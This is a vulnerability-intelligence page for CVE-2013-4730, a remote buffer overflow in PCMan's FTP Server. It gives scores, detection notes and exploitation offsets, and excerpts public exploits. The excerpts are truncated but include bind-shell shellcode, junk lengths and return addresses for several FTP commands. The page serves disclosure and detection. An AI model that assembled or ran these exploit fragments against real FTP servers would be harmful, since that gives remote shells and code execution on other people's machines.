CVE-2013-4730
Published 2014-05-15
Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to execute arbitrary code via a long string in a USER command.
Priority: P269. CVSS 2.0 base score 10 (critical); vector AV:N/AC:L/Au:N/C:C/I:C/A:C.
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below).
EPSS: 67.23% (99.2th percentile).
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pcman_s_ftp_server_project | pcman_s_ftp_server | — | — |
Detection & IOCs (extracted from sources)
Byte sequences, addresses and banner strings quoted in the public exploits:
- \x53\x02\x67\x75
- 0x7e429353
- 220 PCMan's FTP Server 2.0 Ready.
- 0x7C91FCD8
- \x83\xc4\x9c
- 220 PCMan's FTP Server 2.0
- \xDB\xFC\x1C\x75
- \x65\x82\xA5\x7C
- \x59\x06\xbb\x76
Detection notes:
- Detect FTP USER command with payload exceeding 2005 bytes — characteristic of PCMan FTP USER overflow exploitation
- Detect FTP PASS command with payload exceeding 6102 bytes — characteristic of PCMan FTP PASS overflow exploitation
- Detect FTP STOR command containing '/../' followed by a large buffer — characteristic of PCMan FTP STOR overflow exploitation
- Detect FTP MKD command with payload exceeding 2007 bytes — characteristic of PCMan FTP MKD overflow exploitation
- Detect FTP CWD command with payload exceeding 2012 bytes — characteristic of PCMan FTP CWD overflow exploitation
- Flag FTP server banners matching '220 PCMan's FTP Server 2.0' as vulnerable to multiple buffer overflow commands (USER, PASS, STOR, MKD, CWD)
- Bad characters for payload crafting against PCMan FTP USER command are \x53\x93\x42\x7E — filter/alert on FTP USER payloads avoiding these bytes
- Bad characters for STOR command exploit are \x00\xff\x0a\x0d\x20\x40 — useful for distinguishing crafted payloads in FTP traffic
Target-specific details:
- The CALL ESP ROP gadget address (0x75670253 / Kernel32.dll) used in the PASS exploit is Windows 7 SP1 French-specific and will differ on other OS versions/languages
- The USER exploit RET address (0x7e429353, push esp/ret) targets Windows XP SP3 English only; the NVD entry notes RET needs adjustment for other targets
- The STOR exploit RET address (0x7C91FCD8, jmp esp from kernel32.dll) and offset (2002) are specific to Windows XP SP3
- The MKD exploit RET address (0x7CA58265, jmp esp from shell32.dll) is specific to Windows XP SP3; will not apply to other platforms
- The CWD exploit ESP address (0x76BB0659) is specific to Windows 7 SP1 x64 English; offsets and gadget addresses will differ on other targets
- Multiple FTP commands are vulnerable (USER, PASS, STOR, MKD, CWD); CVE-2013-4730 is formally attributed to USER but exploitation extends to other commands
No detection rules found.
Exploit-DB · 2015-08-29: PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
---
```python
#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date: 29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
import socket
import sys
# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f"
"\x59\x45\xa7\x18\xa0\x3
```
Exploit-DB · 2015-02-14: PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
---
```python
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4
```
Exploit-DB · 2014-02-20: PCMan FTP Server 2.07 - Remote Buffer Overflow
---
```python
# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
# Date: Feb 19, 2014
# Exploit Author: Sumit
# Version: 2.07
# Tested on: Windows XP Professional SP3
# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
#
import socket
import datetime
"""
You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
"""
host = '192.168.213.10'
d = str(datetime.da
```
Exploit-DB · 2014-01-29: PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
---
```python
# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host " % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
    #vars
    junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
    espaddress = '\x59\x06\xbb\x76' # 76BB0659
    nops = '\x90' * 10
    shellcode = ( # BIND SHELL | PORT 4444
    "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
    "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
    "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
```
Exploit-DB · 2014-01-29: PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
```python
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host " % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
    #vars
    junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
    espaddress = '\x59\x06\xbb\x76' # 76BB0659
    nops = '\x90' * 10
    shellcode = ( # BIND SHELL | PORT 4444
    "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
    "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
    "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
```
Exploit-DB · 2013-09-17: PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMAN FTP Server STOR Command Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability
found in the STOR command of the PCMAN FTP v2.07 Server
when the "/../" parameters are also sent to the server.
},
'Author' => [
'Christian (Polunchis) Ramirez', # Initial Discovery
'Rick (nanotechz9l) Flores', # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exp
```
Exploit-DB · 2013-08-19: PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow
---
```python
#!/usr/bin/python
# Exploit Title: PCMAN FTP 2.07 STOR Command - buffer overflow
# Date: 18 August 2013
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Contact: [email protected]
# Version: PCMAN FTP 2.07 STOR Command
# Tested on: Windows XP SP3, Spanish
# Thanks: To GOD for giving me wisdom
#
# Description:
# A buffer overflow is triggered when a long STOR command is sent to the server followed by these /../ parameters
import socket, sys, os, time
if len(sys.argv) != 3:
    print "[*] Uso: %s \n" % sys.argv[0]
    print "[*] Exploit created by Polunchis"
    print "[*] https://www.intrusionlabs.org"
    sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
#msfpayload windows/shell_bind_tcp LPORT=2887
```
Exploit-DB · 2013-08-02: PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow
---
```python
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
PCMAN FTPD 2.07 PASS Command Buffer Overflow
Author: Ottomatik
Date: 2013-07-31
Software : PCMAN FTPD
Version : 2.07
Tested On: Windows 7 SP1 - French;
Description:
* The PASS Command is vulnerable to a buffer overflow;
* Other commands may be vulnerable;
"""
# Modules import;
import socket
def main() :
    """
    Main function;
    """
    buf = "PASS "
    buf += "A" * 6102 # JUNK
    # 0x75670253
    buf += "\x53\x02\x67\x75" # @ CALL ESP Kernel32.dll
    buf += "\x90" * 40 # NOPs
    # ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D
    buf +=("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"
    "\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"
    "\xc1\x0f\x93\x4d\x4b\
```
Exploit-DB · 2013-07-22: PCMan FTP Server 2.0.7 - Remote (Metasploit)
---
```ruby
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.
},
'Author' => 'MSJ ',
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 2005,
'BadChars' => "\x53\x93\x42\x7E",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows XP SP3 En
```
Exploit-DB · 2013-06-30: PCMan FTP Server 2.0 - Remote Buffer Overflow
---
```python
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1
```
Metasploit: PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow
This module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server. Please note authentication is required in order to trigger the vulnerability. The overflowing string will also be seen on the FTP server log console.
Metasploit: PCMAN FTP Server Buffer Overflow - PUT Command
This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled.
No writeups or analysis indexed.
References:
- http://infosec42.blogspot.com/2013/06/unauthenticated-pcman-ftp-207-buffer.html
- http://osvdb.org/show/osvdb/94624
- http://www.exploit-db.com/exploits/26471
- http://www.securityfocus.com/bid/60837